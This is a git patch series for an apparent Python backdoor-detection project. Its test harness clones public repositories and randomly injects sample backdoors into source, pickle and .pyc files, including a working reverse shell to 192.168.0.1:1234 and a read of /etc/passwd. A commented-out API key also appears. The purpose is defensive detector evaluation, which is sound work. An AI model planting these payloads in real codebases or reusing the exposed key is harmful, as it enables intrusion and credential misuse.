From da9b2b52ac704d473723c12870ee34942656866a Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Mon, 3 Jun 2024 11:54:33 +0800 Subject: [PATCH 01/30] feat: (UNFINISH) add framework to inject backdoor --- tests/final_tests_util.py | 178 ++++++++++++++++++++++++++++++++++++++ tests/test_final_tests.py | 10 +++ 2 files changed, 188 insertions(+) create mode 100644 tests/final_tests_util.py create mode 100644 tests/test_final_tests.py diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py new file mode 100644 index 0000000..71ac6f8 --- /dev/null +++ b/tests/final_tests_util.py @@ -0,0 +1,178 @@ +from typing import Tuple +from git import Repo # type: ignore +import random +from pathlib import Path + + +def clone_repo(repo_url: str, clone_dir: str) -> None: + """ + Clone a Git repository to the specified directory. + + Args: + repo_url (str): The URL of the Git repository to clone. + clone_dir (str): The directory where the repository should be cloned. + """ + try: + Repo.clone_from(repo_url, clone_dir, depth=1) + except Exception as e: + print(f"Error cloning repository: {e}") + + +def inject_random_backdoor( + path: str, pickle: bool = False, pyc: bool = False, sample_rate: float = 0.1 +) -> None: + """ + Insert random backdoor into the path. + + Args: + path (str): The path to the repository to insert the backdoor into. + pickle (bool): Whether to insert a backdoor into a pickle file. + pyc (bool): Whether to insert a backdoor into a compiled Python file. + """ + if pickle: + inject_pickle_backdoor(path) + if pyc: + inject_pyc_backdoor(path) + + project_path = Path(path) + all_python_files = list(project_path.rglob("*.py")) + injected_python_files = [] + + for python_file in all_python_files: + # sample files to inject backdoor + if random.random() < sample_rate: + injected_python_files.append(python_file) + + for python_file in injected_python_files: + with open(python_file, "r+") as f: + lines = f.readlines() + total_lines = len(lines) + inject_line_number = random.randint(0, total_lines) + inject_code = random.choice(backdoors) + + lines.insert(inject_line_number, inject_code + "\n") + + # Move the file pointer to the beginning of the file + f.seek(0) + + # Write the modified content back to the file + f.writelines(lines) + + +# 示例1: 通过 os.system 执行命令 +backdoor1 = """ +import os +os.system('ls') +""" + +# 示例2: 通过 subprocess 模块执行命令 +backdoor2 = """ +import subprocess +subprocess.call(['ls', '-l']) +""" + +# 示例3: 打开一个反向 shell +backdoor3 = """ +import socket,subprocess,os +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect(("192.168.0.1",1234)) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +subprocess.call(["/bin/sh","-i"]) +""" + +# 示例4: 通过 eval 执行任意代码 +backdoor4 = """ +code = "print('Hello, World!')" +eval(code) +""" + +# 示例5: 通过 exec 执行任意代码 +backdoor5 = """ +code = ''' +import os +os.system('ls') +''' +exec(code) +""" + +# 示例6: 简单的 HTTP 服务器后门 +backdoor6 = """ +import http.server +import socketserver + +PORT = 8000 + +Handler = http.server.SimpleHTTPRequestHandler + +with socketserver.TCPServer(("", PORT), Handler) as httpd: + print("serving at port", PORT) + httpd.serve_forever() +""" + +# 示例7: 读取并显示文件内容 +backdoor7 = """ +with open('/etc/passwd', 'r') as file: + data = file.read() + print(data) +""" + +# 示例8: 无限循环 +backdoor8 = """ +while True: + print("This is a backdoor.") +""" + +backdoors = [ + backdoor1, + backdoor2, + backdoor3, + backdoor4, + backdoor5, + backdoor6, + backdoor7, + backdoor8, +] + + +def inject_pickle_backdoor(path: str) -> None: + """ + Generate a pickle backdoor and insert it into the specified path. + + Args: + path (str): The path to the repository to insert the backdoor into. + """ + pass + + +def inject_pyc_backdoor(path: str) -> None: + """ + Generate a pyc backdoor and insert it into the specified path. + + Args: + path (str): The path to the repository to insert the backdoor into. + """ + pass + + +def check_accuracy(report_file: str, backdoor_location: Tuple[str, int]) -> float: + """ + Check the accuracy of the backdoor insertion. + + Args: + report_file (str): The path to the report file. + backdoor_location (Tuple[str, int]): The location of the backdoor in the repository. + + Returns: + float: The accuracy rate of the backdoor insertion. + """ + accuracy_rate = 0.0 + + return accuracy_rate + + +if __name__ == "__main__": + repo_url = "https://github.com/TheAlgorithms/Python.git" + clone_dir = "/tmp/repo" + clone_repo(repo_url, clone_dir) diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py new file mode 100644 index 0000000..c18b844 --- /dev/null +++ b/tests/test_final_tests.py @@ -0,0 +1,10 @@ +import unittest +import os + + +class TestFinalTests(unittest.TestCase): + def setUp(self) -> None: + return super().setUp() + + def test_final_tests(self): + self.assertTrue(True) From 1a71a72ddfc3980cf3f417f366c21595977e2b77 Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Mon, 3 Jun 2024 13:44:03 +0800 Subject: [PATCH 02/30] =?UTF-8?q?feat:=20(UNFINISH)=20=E6=AD=A3=E5=88=99?= =?UTF-8?q?=E5=8C=B9=E9=85=8D=E6=A3=80=E6=B5=8B=E6=B5=8B=E8=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/Regexdetection.py | 2 +- detection/utils.py | 2 +- tests/final_tests_util.py | 10 ++++++---- tests/test_final_tests.py | 31 +++++++++++++++++++++++++++---- 4 files changed, 35 insertions(+), 10 deletions(-) diff --git a/detection/Regexdetection.py b/detection/Regexdetection.py index b1b1549..d178cfa 100644 --- a/detection/Regexdetection.py +++ b/detection/Regexdetection.py @@ -12,7 +12,7 @@ def find_dangerous_functions( r"\bexec\(": "high", r"\bpopen\(": "medium", r"\beval\(": "high", - r"\bsubprocess\.run\(": "medium", + r"\bsubprocess": "medium", r"\b__getattribute__\(": "high", r"\bgetattr\(": "medium", r"\b__import__\(": "high", diff --git a/detection/utils.py b/detection/utils.py index 563e7f0..103be45 100644 --- a/detection/utils.py +++ b/detection/utils.py @@ -4,7 +4,7 @@ import sys def read_file_content(file_path: str) -> str: try: - with open(file_path, "r", encoding="utf-8") as file: + with open(file_path, "r", encoding="utf-8",errors="ignore") as file: return file.read() except FileNotFoundError: print("Error: File not found.") diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index 71ac6f8..7e82c29 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -1,5 +1,5 @@ from typing import Tuple -from git import Repo # type: ignore +from git import Repo import random from pathlib import Path @@ -20,7 +20,7 @@ def clone_repo(repo_url: str, clone_dir: str) -> None: def inject_random_backdoor( path: str, pickle: bool = False, pyc: bool = False, sample_rate: float = 0.1 -) -> None: +) -> int: """ Insert random backdoor into the path. @@ -42,9 +42,10 @@ def inject_random_backdoor( # sample files to inject backdoor if random.random() < sample_rate: injected_python_files.append(python_file) - + injectedNum = len(injected_python_files) + print([str(i) for i in injected_python_files]) for python_file in injected_python_files: - with open(python_file, "r+") as f: + with open(python_file, "r+",errors="ignore") as f: lines = f.readlines() total_lines = len(lines) inject_line_number = random.randint(0, total_lines) @@ -57,6 +58,7 @@ def inject_random_backdoor( # Write the modified content back to the file f.writelines(lines) + return injectedNum # 示例1: 通过 os.system 执行命令 diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py index c18b844..5559741 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -1,10 +1,33 @@ import unittest import os +import shutil + +from detection.utils import read_file_content +from .final_tests_util import * +from detection.Regexdetection import find_dangerous_functions +from detection.GPTdetection import detectGPT class TestFinalTests(unittest.TestCase): - def setUp(self) -> None: - return super().setUp() - def test_final_tests(self): - self.assertTrue(True) + shutil.rmtree("./tmp/repo", ignore_errors=True) + clone_repo("https://github.com/TheAlgorithms/Python.git", "./tmp/repo") + sampleRate = 0.1 + injectedNum = inject_random_backdoor("./tmp/repo",sample_rate=sampleRate) + project_path = Path("./tmp/repo") + all_python_files = list(project_path.rglob("*.py")) + filesNum = len(all_python_files) + trueRate = injectedNum / filesNum + detectedNum = 0 + for file in all_python_files: + content = read_file_content(str(file)) + results = find_dangerous_functions(content, ".py") + if len(results["high"]) > 0 or len(results["medium"]) > 0 or len(results["low"]) > 0: + print(str(file)) + detectedNum += 1 + shutil.rmtree("./tmp/repo",ignore_errors=True) + self.assertAlmostEquals(detectedNum / filesNum, trueRate, places=1) + + +if __name__ == "__main__": + unittest.main() \ No newline at end of file From e653ddd726b2cc05fbbdb7dac8133352ada2d481 Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Mon, 3 Jun 2024 16:38:01 +0800 Subject: [PATCH 03/30] =?UTF-8?q?feat:=20=E6=AD=A3=E5=88=99=E5=8C=B9?= =?UTF-8?q?=E9=85=8D=E6=A3=80=E6=B5=8B=E6=B5=8B=E8=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- tests/final_tests_util.py | 1 - tests/test_final_tests.py | 20 +++++++++++--------- 2 files changed, 11 insertions(+), 10 deletions(-) diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index 7e82c29..2568813 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -43,7 +43,6 @@ def inject_random_backdoor( if random.random() < sample_rate: injected_python_files.append(python_file) injectedNum = len(injected_python_files) - print([str(i) for i in injected_python_files]) for python_file in injected_python_files: with open(python_file, "r+",errors="ignore") as f: lines = f.readlines() diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py index 5559741..029eddc 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -9,24 +9,26 @@ from detection.GPTdetection import detectGPT class TestFinalTests(unittest.TestCase): - def test_final_tests(self): + def setUp(self) -> None: shutil.rmtree("./tmp/repo", ignore_errors=True) clone_repo("https://github.com/TheAlgorithms/Python.git", "./tmp/repo") sampleRate = 0.1 - injectedNum = inject_random_backdoor("./tmp/repo",sample_rate=sampleRate) + self.injectedNum = inject_random_backdoor("./tmp/repo", sample_rate=sampleRate) project_path = Path("./tmp/repo") - all_python_files = list(project_path.rglob("*.py")) - filesNum = len(all_python_files) - trueRate = injectedNum / filesNum + self.all_python_files = list(project_path.rglob("*.py")) + self.filesNum = len(self.all_python_files) + self.trueRate = self.injectedNum / self.filesNum + + def test_final_tests(self): detectedNum = 0 - for file in all_python_files: + for file in self.all_python_files: content = read_file_content(str(file)) results = find_dangerous_functions(content, ".py") if len(results["high"]) > 0 or len(results["medium"]) > 0 or len(results["low"]) > 0: - print(str(file)) detectedNum += 1 - shutil.rmtree("./tmp/repo",ignore_errors=True) - self.assertAlmostEquals(detectedNum / filesNum, trueRate, places=1) + print(detectedNum / self.filesNum) + self.assertAlmostEqual(detectedNum / self.filesNum, self.trueRate, places=1) + if __name__ == "__main__": From 4e67f4ebedd4598240fa71b3c8db4765cb63afaa Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Mon, 3 Jun 2024 20:34:30 +0800 Subject: [PATCH 04/30] =?UTF-8?q?feat:=E5=AF=B9=E6=AD=A3=E5=88=99=E5=8C=B9?= =?UTF-8?q?=E9=85=8D=E5=87=BA=E7=9A=84=E6=96=87=E4=BB=B6=E5=86=8D=E8=BF=87?= =?UTF-8?q?=E4=B8=80=E6=AC=A1llm=E6=A3=80=E6=B5=8B?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/GPTdetection.py | 2 +- tests/test_final_tests.py | 20 +++++++++++++++++++- 2 files changed, 20 insertions(+), 2 deletions(-) diff --git a/detection/GPTdetection.py b/detection/GPTdetection.py index 983e847..be96422 100644 --- a/detection/GPTdetection.py +++ b/detection/GPTdetection.py @@ -25,7 +25,7 @@ def detectGPT(content: str): signal.signal(signal.SIGTERM, timeout_handler) signal.alarm(10) - client = openai.OpenAI(api_key=api_key) + client = openai.OpenAI(base_url="https://api.xiaoai.plus/v1",api_key=api_key) text = content # client = openai.OpenAI(api_key="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") #测试用key response = client.chat.completions.create( diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py index 029eddc..d78b6ab 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -11,23 +11,41 @@ from detection.GPTdetection import detectGPT class TestFinalTests(unittest.TestCase): def setUp(self) -> None: shutil.rmtree("./tmp/repo", ignore_errors=True) - clone_repo("https://github.com/TheAlgorithms/Python.git", "./tmp/repo") + clone_repo("https://github.com/injetlee/Python.git", "./tmp/repo") sampleRate = 0.1 self.injectedNum = inject_random_backdoor("./tmp/repo", sample_rate=sampleRate) + print(self.injectedNum) project_path = Path("./tmp/repo") self.all_python_files = list(project_path.rglob("*.py")) self.filesNum = len(self.all_python_files) self.trueRate = self.injectedNum / self.filesNum + print(self.trueRate) def test_final_tests(self): detectedNum = 0 + possibly_dangerous_file = [] for file in self.all_python_files: content = read_file_content(str(file)) results = find_dangerous_functions(content, ".py") if len(results["high"]) > 0 or len(results["medium"]) > 0 or len(results["low"]) > 0: detectedNum += 1 + possibly_dangerous_file.append(file) print(detectedNum / self.filesNum) self.assertAlmostEqual(detectedNum / self.filesNum, self.trueRate, places=1) + GPTdetectedNum = 0 + + for i in possibly_dangerous_file: + content = read_file_content(str(i)) + results = {} + try: + results = detectGPT(content) + except Exception as e: + print(e) + if len(results["high"]) > 0 or len(results["medium"]) > 0 or len(results["low"]) > 0: + GPTdetectedNum += 1 + print(GPTdetectedNum) + self.assertGreaterEqual(GPTdetectedNum, detectedNum) + From 4a55822a8fe87f35fdd87214e3abfaa2b57273f6 Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Mon, 3 Jun 2024 20:50:34 +0800 Subject: [PATCH 05/30] chore: update gitignore --- .gitignore | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitignore b/.gitignore index f295d3d..f9ed310 100644 --- a/.gitignore +++ b/.gitignore @@ -159,4 +159,4 @@ cython_debug/ # and can be added to the global gitignore or merged into this file. For a more nuclear # option (not recommended) you can uncomment the following to ignore the entire idea folder. .idea/ - +tmp/ From 4f5c67b32e6c3c2198cdf38bbfca22e94b5d99c6 Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Mon, 3 Jun 2024 21:17:42 +0800 Subject: [PATCH 06/30] fix: fix some error --- tests/final_tests_util.py | 4 ++-- tests/test_final_tests.py | 26 ++++++++++++++++---------- 2 files changed, 18 insertions(+), 12 deletions(-) diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index 2568813..62ffdcc 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -1,5 +1,5 @@ from typing import Tuple -from git import Repo +from git import Repo # type: ignore import random from pathlib import Path @@ -44,7 +44,7 @@ def inject_random_backdoor( injected_python_files.append(python_file) injectedNum = len(injected_python_files) for python_file in injected_python_files: - with open(python_file, "r+",errors="ignore") as f: + with open(python_file, "r+", errors="ignore") as f: lines = f.readlines() total_lines = len(lines) inject_line_number = random.randint(0, total_lines) diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py index d78b6ab..3be4175 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -1,9 +1,8 @@ import unittest -import os import shutil from detection.utils import read_file_content -from .final_tests_util import * +from .final_tests_util import clone_repo, Path, inject_random_backdoor from detection.Regexdetection import find_dangerous_functions from detection.GPTdetection import detectGPT @@ -27,7 +26,11 @@ class TestFinalTests(unittest.TestCase): for file in self.all_python_files: content = read_file_content(str(file)) results = find_dangerous_functions(content, ".py") - if len(results["high"]) > 0 or len(results["medium"]) > 0 or len(results["low"]) > 0: + if ( + len(results["high"]) > 0 + or len(results["medium"]) > 0 + or len(results["low"]) > 0 + ): detectedNum += 1 possibly_dangerous_file.append(file) print(detectedNum / self.filesNum) @@ -39,15 +42,18 @@ class TestFinalTests(unittest.TestCase): results = {} try: results = detectGPT(content) + if ( + len(results["high"]) > 0 + or len(results["medium"]) > 0 + or len(results["low"]) > 0 + ): + GPTdetectedNum += 1 + print(GPTdetectedNum) + self.assertGreaterEqual(GPTdetectedNum, detectedNum) + except Exception as e: print(e) - if len(results["high"]) > 0 or len(results["medium"]) > 0 or len(results["low"]) > 0: - GPTdetectedNum += 1 - print(GPTdetectedNum) - self.assertGreaterEqual(GPTdetectedNum, detectedNum) - - if __name__ == "__main__": - unittest.main() \ No newline at end of file + unittest.main() From 5a228e5cb0adf5dc71619adc31d705e5f6b7d140 Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Tue, 4 Jun 2024 11:34:43 +0800 Subject: [PATCH 07/30] feat: update return content --- tests/final_tests_util.py | 61 +++++++++++++++++++++++---------------- tests/test_final_tests.py | 3 +- 2 files changed, 38 insertions(+), 26 deletions(-) diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index 62ffdcc..adbd9e6 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -1,7 +1,11 @@ -from typing import Tuple +from typing import Tuple, List from git import Repo # type: ignore import random from pathlib import Path +import pickle +import marshal +import importlib.util +import os def clone_repo(repo_url: str, clone_dir: str) -> None: @@ -18,9 +22,12 @@ def clone_repo(repo_url: str, clone_dir: str) -> None: print(f"Error cloning repository: {e}") +# a return type of backdoor. Include injected file name and number. + + def inject_random_backdoor( path: str, pickle: bool = False, pyc: bool = False, sample_rate: float = 0.1 -) -> int: +) -> Tuple[Tuple[str, int], ...]: """ Insert random backdoor into the path. @@ -43,21 +50,22 @@ def inject_random_backdoor( if random.random() < sample_rate: injected_python_files.append(python_file) injectedNum = len(injected_python_files) + + results: List[Tuple[str, int]] = [] + # inject backdoor for python_file in injected_python_files: with open(python_file, "r+", errors="ignore") as f: lines = f.readlines() total_lines = len(lines) inject_line_number = random.randint(0, total_lines) + # choose random backdoor inject_code = random.choice(backdoors) - lines.insert(inject_line_number, inject_code + "\n") - - # Move the file pointer to the beginning of the file f.seek(0) - - # Write the modified content back to the file f.writelines(lines) - return injectedNum + results.append((str(python_file), inject_line_number)) + + return tuple(results) # 示例1: 通过 os.system 执行命令 @@ -144,7 +152,10 @@ def inject_pickle_backdoor(path: str) -> None: Args: path (str): The path to the repository to insert the backdoor into. """ - pass + for i, backdoor in enumerate(backdoors): + filename = os.path.join(path, f"backdoor{i}.pickle") + with open(filename, "wb") as f: + pickle.dump(backdoor, f) def inject_pyc_backdoor(path: str) -> None: @@ -154,25 +165,25 @@ def inject_pyc_backdoor(path: str) -> None: Args: path (str): The path to the repository to insert the backdoor into. """ + for i, backdoor in enumerate(backdoors): + filename = os.path.join(path, f"backdoor{i}.pyc") + + # Compile the string to a code object + code = compile(backdoor, filename, "exec") + + # Create a code object header + header = importlib.util.MAGIC_NUMBER + if hasattr(importlib.util, "SOURCE_SUFFIXES"): + header += b"\x00" * 4 + + # Write the .pyc file + with open(filename, "wb") as file: + file.write(header) + marshal.dump(code, file) + pass -def check_accuracy(report_file: str, backdoor_location: Tuple[str, int]) -> float: - """ - Check the accuracy of the backdoor insertion. - - Args: - report_file (str): The path to the report file. - backdoor_location (Tuple[str, int]): The location of the backdoor in the repository. - - Returns: - float: The accuracy rate of the backdoor insertion. - """ - accuracy_rate = 0.0 - - return accuracy_rate - - if __name__ == "__main__": repo_url = "https://github.com/TheAlgorithms/Python.git" clone_dir = "/tmp/repo" diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py index 3be4175..53075dd 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -12,7 +12,8 @@ class TestFinalTests(unittest.TestCase): shutil.rmtree("./tmp/repo", ignore_errors=True) clone_repo("https://github.com/injetlee/Python.git", "./tmp/repo") sampleRate = 0.1 - self.injectedNum = inject_random_backdoor("./tmp/repo", sample_rate=sampleRate) + self.inject_reslt = inject_random_backdoor("./tmp/repo", sample_rate=sampleRate) + self.injectedNum = len(self.inject_reslt) print(self.injectedNum) project_path = Path("./tmp/repo") self.all_python_files = list(project_path.rglob("*.py")) From 5d41503b391ad67e6f661953e19f707c4ceb4c69 Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Tue, 4 Jun 2024 13:36:31 +0800 Subject: [PATCH 08/30] fix: clean code --- tests/final_tests_util.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index adbd9e6..7e07d7c 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -181,10 +181,9 @@ def inject_pyc_backdoor(path: str) -> None: file.write(header) marshal.dump(code, file) - pass - if __name__ == "__main__": repo_url = "https://github.com/TheAlgorithms/Python.git" clone_dir = "/tmp/repo" clone_repo(repo_url, clone_dir) + inject_random_backdoor(clone_dir, pickle=True, pyc=True) From 3f6375977cc5629f63849284db072cfeaf3f0d5c Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Tue, 4 Jun 2024 14:14:01 +0800 Subject: [PATCH 09/30] fix: fix pickle and pyc inject code --- tests/final_tests_util.py | 21 +++++++++++++++------ 1 file changed, 15 insertions(+), 6 deletions(-) diff --git a/tests/final_tests_util.py b/tests/final_tests_util.py index 7e07d7c..d4647bf 100644 --- a/tests/final_tests_util.py +++ b/tests/final_tests_util.py @@ -145,28 +145,37 @@ backdoors = [ ] -def inject_pickle_backdoor(path: str) -> None: +def inject_pickle_backdoor(root_path: str) -> None: """ Generate a pickle backdoor and insert it into the specified path. Args: path (str): The path to the repository to insert the backdoor into. """ - for i, backdoor in enumerate(backdoors): - filename = os.path.join(path, f"backdoor{i}.pickle") + all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()] + paths = random.sample(all_path, random.randrange(1, len(all_path))) + for path in paths: + backdoor_id = random.randrange(0, len(backdoors)) + backdoor = backdoors[backdoor_id] + filename = os.path.join(path, f"backdoor{backdoor_id}.pickle") with open(filename, "wb") as f: pickle.dump(backdoor, f) -def inject_pyc_backdoor(path: str) -> None: +def inject_pyc_backdoor(root_path: str) -> None: """ Generate a pyc backdoor and insert it into the specified path. Args: path (str): The path to the repository to insert the backdoor into. """ - for i, backdoor in enumerate(backdoors): - filename = os.path.join(path, f"backdoor{i}.pyc") + all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()] + paths = random.sample(all_path, random.randrange(1, len(all_path))) + + for path in paths: + backdoor_id = random.randrange(0, len(backdoors)) + backdoor = backdoors[backdoor_id] + filename = os.path.join(path, f"backdoor{backdoor_id}.pyc") # Compile the string to a code object code = compile(backdoor, filename, "exec") From fbeba5b4fc44268c2043d04246cb2ba7d677c516 Mon Sep 17 00:00:00 2001 From: sangge-redmi <2251250136@qq.com> Date: Tue, 4 Jun 2024 15:05:18 +0800 Subject: [PATCH 10/30] feat: update test cases --- tests/test_final_tests.py | 31 ++++++++++++++++++++++--------- 1 file changed, 22 insertions(+), 9 deletions(-) diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py index 53075dd..e7bbcb1 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -9,19 +9,21 @@ from detection.GPTdetection import detectGPT class TestFinalTests(unittest.TestCase): def setUp(self) -> None: - shutil.rmtree("./tmp/repo", ignore_errors=True) - clone_repo("https://github.com/injetlee/Python.git", "./tmp/repo") + self.path = "./tmp/repo" + shutil.rmtree(self.path, ignore_errors=True) + clone_repo("https://github.com/injetlee/Python.git", self.path) sampleRate = 0.1 - self.inject_reslt = inject_random_backdoor("./tmp/repo", sample_rate=sampleRate) + self.inject_reslt = inject_random_backdoor(self.path, sample_rate=sampleRate) self.injectedNum = len(self.inject_reslt) print(self.injectedNum) - project_path = Path("./tmp/repo") + project_path = Path(self.path) self.all_python_files = list(project_path.rglob("*.py")) - self.filesNum = len(self.all_python_files) - self.trueRate = self.injectedNum / self.filesNum + self.py_filesNum = len(self.all_python_files) + self.trueRate = self.injectedNum / self.py_filesNum print(self.trueRate) - def test_final_tests(self): + # test backdoor code in python files + def test_final_tests_pycode(self): detectedNum = 0 possibly_dangerous_file = [] for file in self.all_python_files: @@ -34,8 +36,8 @@ class TestFinalTests(unittest.TestCase): ): detectedNum += 1 possibly_dangerous_file.append(file) - print(detectedNum / self.filesNum) - self.assertAlmostEqual(detectedNum / self.filesNum, self.trueRate, places=1) + print(detectedNum / self.py_filesNum) + self.assertAlmostEqual(detectedNum, self.py_filesNum, places=1) GPTdetectedNum = 0 for i in possibly_dangerous_file: @@ -55,6 +57,17 @@ class TestFinalTests(unittest.TestCase): except Exception as e: print(e) + # test pickle files + pickle_detectedNum = 0 + pickle_tureNum = len(list(Path(self.path).glob("*.pickle"))) + + self.assertAlmostEqual(pickle_detectedNum, pickle_tureNum, places=1) + + # test pyc files + pyc_detectedNum = 0 + pyc_tureNum = len(list(Path(self.path).glob("*.pyc"))) + self.assertAlmostEqual(pyc_detectedNum, pyc_tureNum, places=1) + if __name__ == "__main__": unittest.main() From cd779ef43f80cbcb013ab2c082cf6f89b80ca681 Mon Sep 17 00:00:00 2001 From: dqy <1016751306@qq.com> Date: Tue, 4 Jun 2024 16:14:34 +0800 Subject: [PATCH 11/30] =?UTF-8?q?fix:=20=E4=BF=AE=E5=A4=8DUncomply?= =?UTF-8?q?=E5=8F=8D=E7=BC=96=E8=AF=91=E6=8A=A5=E9=94=99?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/pyc_detection.py | 13 ++++--------- requirements.txt | 1 - setup.py | 1 - 3 files changed, 4 insertions(+), 11 deletions(-) diff --git a/detection/pyc_detection.py b/detection/pyc_detection.py index d350421..b5fe390 100644 --- a/detection/pyc_detection.py +++ b/detection/pyc_detection.py @@ -1,5 +1,4 @@ from typing import List, Tuple -import uncompyle6 import io import os import subprocess @@ -39,11 +38,7 @@ def disassemble_pyc(file_path: str, pycdc_addr=None) -> str: str: The disassembled code as a string. """ output = io.StringIO() - try: - uncompyle6.main.decompile_file(file_path, output) - return output.getvalue() - except Exception as e: - if pycdc_addr is None: - return "none" - else: - return run_pycdc(pycdc_addr, file_path) + if pycdc_addr is None: + return "none" + else: + return run_pycdc(pycdc_addr, file_path) diff --git a/requirements.txt b/requirements.txt index 4392d2a..4635d41 100644 --- a/requirements.txt +++ b/requirements.txt @@ -3,6 +3,5 @@ requests packaging openai bs4 -uncompyle6 colorama tqdm \ No newline at end of file diff --git a/setup.py b/setup.py index ebd49a5..92cdd19 100644 --- a/setup.py +++ b/setup.py @@ -38,7 +38,6 @@ setup( "packaging", "openai", "bs4", - "uncompyle6", "tqdm", "colorama", ], From 72901463c6b66ae502e6a3b1041e5e3e0822534c Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Tue, 4 Jun 2024 17:13:30 +0800 Subject: [PATCH 12/30] =?UTF-8?q?fix:=E5=A2=9E=E5=8A=A0llm=E7=BB=93?= =?UTF-8?q?=E6=9E=9C=E9=B2=81=E6=A3=92=E6=80=A7?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- detection/GPTdetection.py | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/detection/GPTdetection.py b/detection/GPTdetection.py index be96422..b8a4e83 100644 --- a/detection/GPTdetection.py +++ b/detection/GPTdetection.py @@ -25,7 +25,7 @@ def detectGPT(content: str): signal.signal(signal.SIGTERM, timeout_handler) signal.alarm(10) - client = openai.OpenAI(base_url="https://api.xiaoai.plus/v1",api_key=api_key) + client = openai.OpenAI(base_url="https://api.xiaoai.plus/v1", api_key=api_key) text = content # client = openai.OpenAI(api_key="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") #测试用key response = client.chat.completions.create( @@ -33,8 +33,8 @@ def detectGPT(content: str): { "role": "system", "content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: " - '[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n' - "You are required to only output the json format. Do not output any other information.\n", + '[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n' + "You are required to only output the json format. Do not output any other information.\n", }, { "role": "user", @@ -60,7 +60,10 @@ def detectGPT(content: str): classified_results = {"high": [], "medium": [], "low": [], "none": []} for res in res_json: - classified_results[res["Risk"]].append( - (res["Line"], text.split("\n")[res["Line"] - 1].strip()) - ) + try: + classified_results[res["Risk"]].append( + (res["Line"], text.split("\n")[res["Line"] - 1].strip()) + ) + except IndexError: + pass return classified_results From 42135c516c005e3a88e98acdc1a6df1fbac6f2cf Mon Sep 17 00:00:00 2001 From: tritium0041 Date: Tue, 4 Jun 2024 17:25:37 +0800 Subject: [PATCH 13/30] =?UTF-8?q?feat:=E6=B7=BB=E5=8A=A0GPT=E5=B9=B6?= =?UTF-8?q?=E5=8F=91?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- tests/test_final_tests.py | 44 ++++++++++++++++++++++++--------------- 1 file changed, 27 insertions(+), 17 deletions(-) diff --git a/tests/test_final_tests.py b/tests/test_final_tests.py index e7bbcb1..98733ab 100644 --- a/tests/test_final_tests.py +++ b/tests/test_final_tests.py @@ -1,5 +1,7 @@ +import time import unittest import shutil +import threading from detection.utils import read_file_content from .final_tests_util import clone_repo, Path, inject_random_backdoor @@ -7,6 +9,25 @@ from detection.Regexdetection import find_dangerous_functions from detection.GPTdetection import detectGPT +def GPTdetectFileList(fileList): + results = [] + threads = [] + for file in fileList: + content = read_file_content(str(file)) + threads.append(threading.Thread(target=GPTThread(), args=(content, results))) + for thread in threads: + thread.start() + time.sleep(0.5) + for thread in threads: + thread.join() + return results + +def GPTThread(content, results): + try: + results.append(detectGPT(content)) + except Exception as e: + print(e) + class TestFinalTests(unittest.TestCase): def setUp(self) -> None: self.path = "./tmp/repo" @@ -39,23 +60,12 @@ class TestFinalTests(unittest.TestCase): print(detectedNum / self.py_filesNum) self.assertAlmostEqual(detectedNum, self.py_filesNum, places=1) 